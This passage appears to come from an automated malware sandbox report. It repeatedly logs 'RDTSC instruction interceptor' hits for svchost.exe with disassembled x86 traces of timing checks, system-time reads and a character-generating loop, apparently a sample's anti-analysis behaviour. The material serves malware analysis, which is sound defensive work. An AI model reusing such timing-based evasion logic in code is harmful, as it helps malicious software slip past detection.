eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59530h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA591D0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59575h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F876h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
